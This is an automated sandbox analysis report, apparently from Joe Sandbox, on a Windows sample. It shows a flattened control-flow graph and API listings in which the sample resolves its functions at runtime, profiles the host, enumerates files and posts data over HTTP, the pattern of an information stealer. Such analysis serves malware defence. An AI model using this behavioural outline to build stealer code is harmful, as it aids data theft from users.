59384 416fb0 4 API calls 59380->59384 59382 416ea0 lstrcpy 59381->59382 59382->59379 59396 404c17 59383->59396 59385 404669 59384->59385 59386 416ea0 lstrcpy 59385->59386 59387 404672 59386->59387 59388 416fb0 4 API calls 59387->59388 59389 404691 59388->59389 59390 416ea0 lstrcpy 59389->59390 59391 40469a 59390->59391 59392 416f20 3 API calls 59391->59392 59393 4046b8 59392->59393 59394 416ea0 lstrcpy 59393->59394 59395 4046c1 59394->59395 59397 416fb0 4 API calls 59395->59397 59396->58547 59398 4046e0 59397->59398 59399 416ea0 lstrcpy 59398->59399 59400 4046e9 59399->59400 59401 416fb0 4 API calls 59400->59401 59402 404708 59401->59402 59403 416ea0 lstrcpy 59402->59403 59404 404711 59403->59404 59405 416fb0 4 API calls 59404->59405 59406 40473d 59405->59406 59407 416f20 3 API calls 59406->59407 59408 404744 59407->59408 59409 416ea0 lstrcpy 59408->59409 59410 40474d 59409->59410 59411 404763 InternetConnectA 59410->59411 59411->59367 59412 404793 HttpOpenRequestA 59411->59412 59414 4047e8 59412->59414 59415 404b7e InternetCloseHandle 59412->59415 59416 416fb0 4 API calls 59414->59416 59415->59367 59417 4047fc 59416->59417 59418 416ea0 lstrcpy 59417->59418 59419 404805 59418->59419 59420 416f20 3 API calls 59419->59420 59421 404823 59420->59421 59422 416ea0 lstrcpy 59421->59422 59423 40482c 59422->59423 59424 416fb0 4 API calls 59423->59424 59425 40484b 59424->59425 59426 416ea0 lstrcpy 59425->59426 59427 404854 59426->59427 59428 416fb0 4 API calls 59427->59428 59429 404875 59428->59429 59430 416ea0 lstrcpy 59429->59430 59431 40487e 59430->59431 59432 416fb0 4 API calls 59431->59432 59433 40489e 59432->59433 59434 416ea0 lstrcpy 59433->59434 59435 4048a7 59434->59435 59436 416fb0 4 API calls 59435->59436 59437 4048c6 59436->59437 59438 416ea0 lstrcpy 59437->59438 59439 4048cf 59438->59439 59440 416f20 3 API calls 59439->59440 59441 4048ed 59440->59441 59442 416ea0 lstrcpy 59441->59442 59443 4048f6 59442->59443 59444 416fb0 4 API calls 59443->59444 59445 404915 
59444->59445 59446 416ea0 lstrcpy 59445->59446 59447 40491e 59446->59447 59448 416fb0 4 API calls 59447->59448 59449 40493d 59448->59449 59450 416ea0 lstrcpy 59449->59450 59451 404946 59450->59451 59452 416f20 3 API calls 59451->59452 59453 404964 59452->59453 59454 416ea0 lstrcpy 59453->59454 59455 40496d 59454->59455 59456 416fb0 4 API calls 59455->59456 59457 40498c 59456->59457 59458 416ea0 lstrcpy 59457->59458 59459 404995 59458->59459 59460 416fb0 4 API calls 59459->59460 59461 4049b6 59460->59461 59462 416ea0 lstrcpy 59461->59462 59463 4049bf 59462->59463 59464 416fb0 4 API calls 59463->59464 59465 4049df 59464->59465 59466 416ea0 lstrcpy 59465->59466 59467 4049e8 59466->59467 59468 416fb0 4 API calls 59467->59468 59469 404a07 59468->59469 59470 416ea0 lstrcpy 59469->59470 59471 404a10 59470->59471 59472 416f20 3 API calls 59471->59472 59473 404a2e 59472->59473 59474 416ea0 lstrcpy 59473->59474 59475 404a37 59474->59475 59476 416d40 lstrcpy 59475->59476 59477 404a52 59476->59477 59478 416f20 3 API calls 59477->59478 59479 404a73 59478->59479 59480 416f20 3 API calls 59479->59480 59481 404a7a 59480->59481 59482 416ea0 lstrcpy 59481->59482 59483 404a86 59482->59483 59484 404aa7 lstrlen 59483->59484 59485 404aba 59484->59485 59486 404ac3 lstrlen 59485->59486 60397 4170d0 59486->60397 59488 404ad3 HttpSendRequestA 59489 404af2 InternetReadFile 59488->59489 59490 404b27 InternetCloseHandle 59489->59490 59495 404b1e 59489->59495 59493 416e00 59490->59493 59492 416fb0 4 API calls 59492->59495 59493->59415 59494 416ea0 lstrcpy 59494->59495 59495->59489 59495->59490 59495->59492 59495->59494 60407 4170d0 59496->60407 59498 40fb04 StrCmpCA 59499 40fb17 59498->59499 59500 40fb0f ExitProcess 59498->59500 59501 40fb27 strtok_s 59499->59501 59504 40fb34 59501->59504 59502 40fccc 59502->58549 59503 40fca8 strtok_s 59503->59504 59504->59502 59504->59503 59505 40fc8b StrCmpCA 59504->59505 59506 40fc6c StrCmpCA 59504->59506 59507 40fb9d StrCmpCA 59504->59507 59508 40fbed 
StrCmpCA 59504->59508 59509 40fc4d StrCmpCA 59504->59509 59510 40fc2e StrCmpCA 59504->59510 59511 40fbbf StrCmpCA 59504->59511 59512 40fc0f StrCmpCA 59504->59512 59513 416e20 lstrlen lstrcpy 59504->59513 59505->59503 59505->59504 59506->59504 59507->59504 59508->59504 59509->59504 59510->59504 59511->59504 59512->59504 59513->59504 59515 416da0 lstrcpy 59514->59515 59516 401513 59515->59516 59517 416da0 lstrcpy 59516->59517 59518 401525 59517->59518 59519 416da0 lstrcpy 59518->59519 59520 401537 59519->59520 59521 416da0 lstrcpy 59520->59521 59522 401549 59521->59522 59523 405610 59522->59523 59524 416da0 lstrcpy 59523->59524 59525 405629 59524->59525 59526 404470 3 API calls 59525->59526 59527 405635 59526->59527 59528 416d40 lstrcpy 59527->59528 59529 40566a 59528->59529 59530 416d40 lstrcpy 59529->59530 59531 405677 59530->59531 59532 416d40 lstrcpy 59531->59532 59533 405684 59532->59533 59534 416d40 lstrcpy 59533->59534 59535 405691 59534->59535 59536 416d40 lstrcpy 59535->59536 59537 40569e InternetOpenA StrCmpCA 59536->59537 59538 4056cd 59537->59538 59539 405c70 InternetCloseHandle 59538->59539 59541 415260 3 API calls 59538->59541 59540 405c8d 59539->59540 59543 4094a0 4 API calls 59540->59543 59542 4056ec 59541->59542 59544 416f20 3 API calls 59542->59544 59545 405c93 59543->59545 59546 4056ff 59544->59546 59548 416e20 2 API calls 59545->59548 59550 405ccc moneypunct 59545->59550 59547 416ea0 lstrcpy 59546->59547 59553 405708 59547->59553 59549 405caa 59548->59549 59551 416fb0 4 API calls 59549->59551 59554 416da0 lstrcpy 59550->59554 59552 405cc0 59551->59552 59555 416ea0 lstrcpy 59552->59555 59556 416fb0 4 API calls 59553->59556 59564 405cfc 59554->59564 59555->59550 59557 405732 59556->59557 59558 416ea0 lstrcpy 59557->59558 59559 40573b 59558->59559 59560 416fb0 4 API calls 59559->59560 59561 40575a 59560->59561 59562 416ea0 lstrcpy 59561->59562 59563 405763 59562->59563 59565 416f20 3 API calls 59563->59565 59564->58555 59566 405781 59565->59566 59567 
416ea0 lstrcpy 59566->59567 59568 40578a 59567->59568 59569 416fb0 4 API calls 59568->59569 59570 4057a9 59569->59570 59571 416ea0 lstrcpy 59570->59571 59572 4057b2 59571->59572 59573 416fb0 4 API calls 59572->59573 59574 4057d1 59573->59574 59575 416ea0 lstrcpy 59574->59575 59576 4057da 59575->59576 59577 416fb0 4 API calls 59576->59577 59578 405806 59577->59578 59579 416f20 3 API calls 59578->59579 59580 40580d 59579->59580 59581 416ea0 lstrcpy 59580->59581 59582 405816 59581->59582 59583 40582c InternetConnectA 59582->59583 59583->59539 59584 40585c HttpOpenRequestA 59583->59584 59586 405c63 InternetCloseHandle 59584->59586 59587 4058bb 59584->59587 59586->59539 59588 416fb0 4 API calls 59587->59588 59589 4058cf 59588->59589 59590 416ea0 lstrcpy 59589->59590 59591 4058d8 59590->59591 59592 416f20 3 API calls 59591->59592 59593 4058f6 59592->59593 59594 416ea0 lstrcpy 59593->59594 59595 4058ff 59594->59595 59596 416fb0 4 API calls 59595->59596 59597 40591e 59596->59597 59598 416ea0 lstrcpy 59597->59598 59599 405927 59598->59599 59600 416fb0 4 API calls 59599->59600 59601 405948 59600->59601 59602 416ea0 lstrcpy 59601->59602 59603 405951 59602->59603 59604 416fb0 4 API calls 59603->59604 59605 405971 59604->59605 59606 416ea0 lstrcpy 59605->59606 59607 40597a 59606->59607 59608 416fb0 4 API calls 59607->59608 59609 405999 59608->59609 59610 416ea0 lstrcpy 59609->59610 59611 4059a2 59610->59611 59612 416f20 3 API calls 59611->59612 59613 4059c0 59612->59613 59614 416ea0 lstrcpy 59613->59614 59615 4059c9 59614->59615 59616 416fb0 4 API calls 59615->59616 59617 4059e8 59616->59617 59618 416ea0 lstrcpy 59617->59618 59619 4059f1 59618->59619 59620 416fb0 4 API calls 59619->59620 59621 405a10 59620->59621 59622 416ea0 lstrcpy 59621->59622 59623 405a19 59622->59623 59624 416f20 3 API calls 59623->59624 59625 405a37 59624->59625 59626 416ea0 lstrcpy 59625->59626 59627 405a40 59626->59627 59628 416fb0 4 API calls 59627->59628 59629 405a5f 59628->59629 59630 416ea0 lstrcpy 
59629->59630 59631 405a68 59630->59631 59632 416fb0 4 API calls 59631->59632 59633 405a89 59632->59633 59634 416ea0 lstrcpy 59633->59634 59635 405a92 59634->59635 59636 416fb0 4 API calls 59635->59636 59637 405ab2 59636->59637 59638 416ea0 lstrcpy 59637->59638 59639 405abb 59638->59639 59640 416fb0 4 API calls 59639->59640 59641 405ada 59640->59641 59642 416ea0 lstrcpy 59641->59642 59643 405ae3 59642->59643 59644 416f20 3 API calls 59643->59644 59645 405b01 59644->59645 59646 416ea0 lstrcpy 59645->59646 59647 405b0a 59646->59647 59648 405b1d lstrlen 59647->59648 60408 4170d0 59648->60408 59650 405b2e lstrlen GetProcessHeap HeapAlloc 60409 4170d0 59650->60409 59652 405b5b lstrlen 60410 4170d0 59652->60410 59654 405b6b memcpy 60411 4170d0 59654->60411 59656 405b84 lstrlen 59657 405b94 59656->59657 59658 405b9d lstrlen memcpy 59657->59658 60412 4170d0 59658->60412 59660 405bc7 lstrlen 60413 4170d0 59660->60413 59662 405bd7 HttpSendRequestA 59663 405be2 InternetReadFile 59662->59663 59664 405c17 InternetCloseHandle 59663->59664 59668 405c0e 59663->59668 59664->59586 59666 416fb0 4 API calls 59666->59668 59667 416ea0 lstrcpy 59667->59668 59668->59663 59668->59664 59668->59666 59668->59667 60414 4170d0 59669->60414 59671 40f3d7 strtok_s 59674 40f3e4 59671->59674 59672 40f4b1 59672->58557 59673 40f48d strtok_s 59673->59674 59674->59672 59674->59673 59675 416e20 lstrlen lstrcpy 59674->59675 59675->59674 60415 4170d0 59676->60415 59678 40f227 strtok_s 59685 40f234 59678->59685 59679 40f363 strtok_s 59679->59685 59680 40f387 59680->58565 59681 40f314 StrCmpCA 59681->59685 59682 40f297 StrCmpCA 59682->59685 59683 40f2d7 StrCmpCA 59683->59685 59684 416e20 lstrlen lstrcpy 59684->59685 59685->59679 59685->59680 59685->59681 59685->59682 59685->59683 59685->59684 59687 416d40 lstrcpy 59686->59687 59688 40fd26 59687->59688 59689 416fb0 4 API calls 59688->59689 59690 40fd37 59689->59690 59691 416ea0 lstrcpy 59690->59691 59692 40fd40 59691->59692 59693 416fb0 4 API calls 
59692->59693 59694 40fd5b 59693->59694 59695 416ea0 lstrcpy 59694->59695 59696 40fd64 59695->59696 59697 416fb0 4 API calls 59696->59697 59698 40fd7d 59697->59698 59699 416ea0 lstrcpy 59698->59699 59700 40fd86 59699->59700 59701 416fb0 4 API calls 59700->59701 59702 40fda1 59701->59702 59703 416ea0 lstrcpy 59702->59703 59704 40fdaa 59703->59704 59705 416fb0 4 API calls 59704->59705 59706 40fdc3 59705->59706 59707 416ea0 lstrcpy 59706->59707 59708 40fdcc 59707->59708 59709 416fb0 4 API calls 59708->59709 59710 40fde7 59709->59710 59711 416ea0 lstrcpy 59710->59711 59712 40fdf0 59711->59712 59713 416fb0 4 API calls 59712->59713 59714 40fe09 59713->59714 59715 416ea0 lstrcpy 59714->59715 59716 40fe12 59715->59716 59717 416fb0 4 API calls 59716->59717 59718 40fe2d 59717->59718 59719 416ea0 lstrcpy 59718->59719 59720 40fe36 59719->59720 59721 416fb0 4 API calls 59720->59721 59722 40fe4f 59721->59722 59723 416ea0 lstrcpy 59722->59723 59724 40fe58 59723->59724 59725 416fb0 4 API calls 59724->59725 59726 40fe76 59725->59726 59727 416ea0 lstrcpy 59726->59727 59728 40fe7f 59727->59728 59729 4141c0 6 API calls 59728->59729 59730 40fe96 59729->59730 59731 416f20 3 API calls 59730->59731 59732 40fea9 59731->59732 59733 416ea0 lstrcpy 59732->59733 59734 40feb2 59733->59734 59735 416fb0 4 API calls 59734->59735 59736 40fedc 59735->59736 59737 416ea0 lstrcpy 59736->59737 59738 40fee5 59737->59738 59739 416fb0 4 API calls 59738->59739 59740 40ff05 59739->59740 59741 416ea0 lstrcpy 59740->59741 59742 40ff0e 59741->59742 60416 414300 GetProcessHeap HeapAlloc RegOpenKeyExA 59742->60416 59744 40ff1e 59745 416fb0 4 API calls 59744->59745 59746 40ff2e 59745->59746 59747 416ea0 lstrcpy 59746->59747 59748 40ff37 59747->59748 59749 416fb0 4 API calls 59748->59749 59750 40ff56 59749->59750 59751 416ea0 lstrcpy 59750->59751 59752 40ff5f 59751->59752 59753 416fb0 4 API calls 59752->59753 59754 40ff80 59753->59754 59755 416ea0 lstrcpy 59754->59755 59756 40ff89 59755->59756 60419 414380 
GetCurrentProcess IsWow64Process 59756->60419 59759 416fb0 4 API calls 59760 40ffa9 59759->59760 59761 416ea0 lstrcpy 59760->59761 59762 40ffb2 59761->59762 59763 416fb0 4 API calls 59762->59763 59764 40ffd1 59763->59764 59765 416ea0 lstrcpy 59764->59765 59766 40ffda 59765->59766 59767 416fb0 4 API calls 59766->59767 59768 40fffb 59767->59768 59769 416ea0 lstrcpy 59768->59769 59770 410004 59769->59770 60421 4143c0 GetProcessHeap HeapAlloc GetUserNameA 59770->60421 59772 410014 59773 416fb0 4 API calls 59772->59773 59774 410024 59773->59774 59775 416ea0 lstrcpy 59774->59775 59776 41002d 59775->59776 59777 416fb0 4 API calls 59776->59777 59778 41004c 59777->59778 59779 416ea0 lstrcpy 59778->59779 59780 410055 59779->59780 59781 416fb0 4 API calls 59780->59781 59782 410075 59781->59782 59783 416ea0 lstrcpy 59782->59783 59784 41007e 59783->59784 59785 414400 3 API calls 59784->59785 59786 41008e 59785->59786 59787 416fb0 4 API calls 59786->59787 59788 41009e 59787->59788 59789 416ea0 lstrcpy 59788->59789 59790 4100a7 59789->59790 59791 416fb0 4 API calls 59790->59791 59792 4100c6 59791->59792 59793 416ea0 lstrcpy 59792->59793 59794 4100cf 59793->59794 59795 416fb0 4 API calls 59794->59795 59796 4100f0 59795->59796 59797 416ea0 lstrcpy 59796->59797 59798 4100f9 59797->59798 60422 414450 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 59798->60422 59800 410109 59801 416fb0 4 API calls 59800->59801 59802 410119 59801->59802 59803 416ea0 lstrcpy 59802->59803 59804 410122 59803->59804 59805 416fb0 4 API calls 59804->59805 59806 410141 59805->59806 59807 416ea0 lstrcpy 59806->59807 59808 41014a 59807->59808 59809 416fb0 4 API calls 59808->59809 59810 41016b 59809->59810 59811 416ea0 lstrcpy 59810->59811 59812 410174 59811->59812 60423 4144b0 GetProcessHeap HeapAlloc GetTimeZoneInformation 59812->60423 59815 416fb0 4 API calls 59816 410194 59815->59816 59817 416ea0 lstrcpy 59816->59817 59818 41019d 59817->59818 59819 416fb0 4 API calls 59818->59819 59820 4101bc 59819->59820 
59821 416ea0 lstrcpy 59820->59821 59822 4101c5 59821->59822 59823 416fb0 4 API calls 59822->59823 59824 4101e5 59823->59824 59825 416ea0 lstrcpy 59824->59825 59826 4101ee 59825->59826 60426 414530 GetUserDefaultLocaleName 59826->60426 59829 416fb0 4 API calls 59830 41020e 59829->59830 59831 416ea0 lstrcpy 59830->59831 59832 410217 59831->59832 59833 416fb0 4 API calls 59832->59833 59834 410236 59833->59834 59835 416ea0 lstrcpy 59834->59835 59836 41023f 59835->59836 59837 416fb0 4 API calls 59836->59837 59838 410260 59837->59838 59839 416ea0 lstrcpy 59838->59839 59840 410269 59839->59840 60431 414570 59840->60431 59842 410280 59843 416f20 3 API calls 59842->59843 59844 410293 59843->59844 59845 416ea0 lstrcpy 59844->59845 59846 41029c 59845->59846 59847 416fb0 4 API calls 59846->59847 59848 4102c6 59847->59848 59849 416ea0 lstrcpy 59848->59849 59850 4102cf 59849->59850 59851 416fb0 4 API calls 59850->59851 59852 4102ef 59851->59852 59853 416ea0 lstrcpy 59852->59853 59854 4102f8 59853->59854 60443 414710 GetSystemPowerStatus 59854->60443 59857 416fb0 4 API calls 59858 410318 59857->59858 59859 416ea0 lstrcpy 59858->59859 59860 410321 59859->59860 59861 416fb0 4 API calls 59860->59861 59862 410340 59861->59862 59863 416ea0 lstrcpy 59862->59863 59864 410349 59863->59864 59865 416fb0 4 API calls 59864->59865 59866 41036a 59865->59866 59867 416ea0 lstrcpy 59866->59867 59868 410373 59867->59868 59869 41037e GetCurrentProcessId 59868->59869 60445 415b70 OpenProcess 59869->60445 59872 416f20 3 API calls 59873 4103a4 59872->59873 59874 416ea0 lstrcpy 59873->59874 59875 4103ad 59874->59875 59876 416fb0 4 API calls 59875->59876 59877 4103d7 59876->59877 59878 416ea0 lstrcpy 59877->59878 59879 4103e0 59878->59879 59880 416fb0 4 API calls 59879->59880 59881 410400 59880->59881 59882 416ea0 lstrcpy 59881->59882 59883 410409 59882->59883 60450 414740 GetProcessHeap HeapAlloc RegOpenKeyExA 59883->60450 59885 410419 59886 416fb0 4 API calls 59885->59886 59887 410429 59886->59887 
Control-flow Graph

APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04405E90,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,043E7420), ref: 0041670A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,04405BD8), ref: 00416722
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,04403790), ref: 0041673A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,04405CC8), ref: 00416753
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,043E7300), ref: 0041676B
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,043E6118), ref: 00416790
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,043E7260), ref: 004167A9
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,043E61B8), ref: 004167C1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,04405C98), ref: 004167D9
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,04405E78), ref: 004167F2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,043E74A0), ref: 0041680A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,043E74C0), ref: 00416822
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,04405E00), ref: 0041683B
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(763B0000,043E7320), ref: 0041685C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(763B0000,043E7500), ref: 00416874
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(763B0000,04405E48), ref: 0041688D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(763B0000,04405CE0), ref: 004168A5
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(763B0000,043E73E0), ref: 004168BD
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(750F0000,043E5FB0), ref: 004168E3
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(750F0000,043E6168), ref: 004168FB
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(750F0000,04405C20), ref: 00416913
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(750F0000,043E72A0), ref: 0041692C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(750F0000,043E73A0), ref: 00416944
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(750F0000,043E6140), ref: 0041695C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,04405D10), ref: 00416982
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,043E7340), ref: 0041699A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,04403840), ref: 004169B2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,04405D28), ref: 004169CB
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,04405BA8), ref: 004169E3
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,043E7560), ref: 004169FB
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,043E7540), ref: 00416A14
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,04405C38), ref: 00416A2C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,04405BC0), ref: 00416A44
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75070000,043E75A0), ref: 00416A66
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75070000,04405D40), ref: 00416A7E
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75070000,04406160), ref: 00416A96
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75070000,04406298), ref: 00416AAF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75070000,04406040), ref: 00416AC7
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E50000,043E75C0), ref: 00416AE8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E50000,043E7600), ref: 00416B01
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75320000,043E7220), ref: 00416B22
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75320000,044060D0), ref: 00416B3A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,043E7360), ref: 00416B60
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,043E7380), ref: 00416B78
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,04406EF8), ref: 00416B90
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,04405FB0), ref: 00416BA9
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,04406C38), ref: 00416BC1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,04406D58), ref: 00416BD9
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,04406E78), ref: 00416BF2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,04406DB8), ref: 00416C0A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E00000,04406190), ref: 00416C2B
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E00000,04403760), ref: 00416C44
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E00000,04406058), ref: 00416C5C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E00000,04406070), ref: 00416C74
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74DF0000,04406BF8), ref: 00416C96
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6CA70000,04405FE0), ref: 00416CB7
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6CA70000,04406C98), ref: 00416CCF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6CA70000,044061A8), ref: 00416CE8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6CA70000,04406178), ref: 00416D00
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2238633743-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004116D2
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 00411995
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                                                                                                                                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                                                                                                                                                                                                                        • API String ID: 1125553467-2524465048
                                                                                                                                                                                                                                                                                        • Opcode ID: e24380de87f91f985b66d320dbe961f46d573dc966b27323ddd82aaccc6d65a1
                                                                                                                                                                                                                                                                                        • Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e24380de87f91f985b66d320dbe961f46d573dc966b27323ddd82aaccc6d65a1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C7CF688,00001000), ref: 6C7435D5
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7435E0
                                                                                                                                                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 6C7435FD
                                                                                                                                                                                                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C74363F
                                                                                                                                                                                                                                                                                        • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C74369F
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C7436E4
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C743773
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C74377E
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C7437BD
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C7437C4
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C7437CB
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C743801
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C743883
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C743902
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C743918
                                                                                                                                                                                                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C74394C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
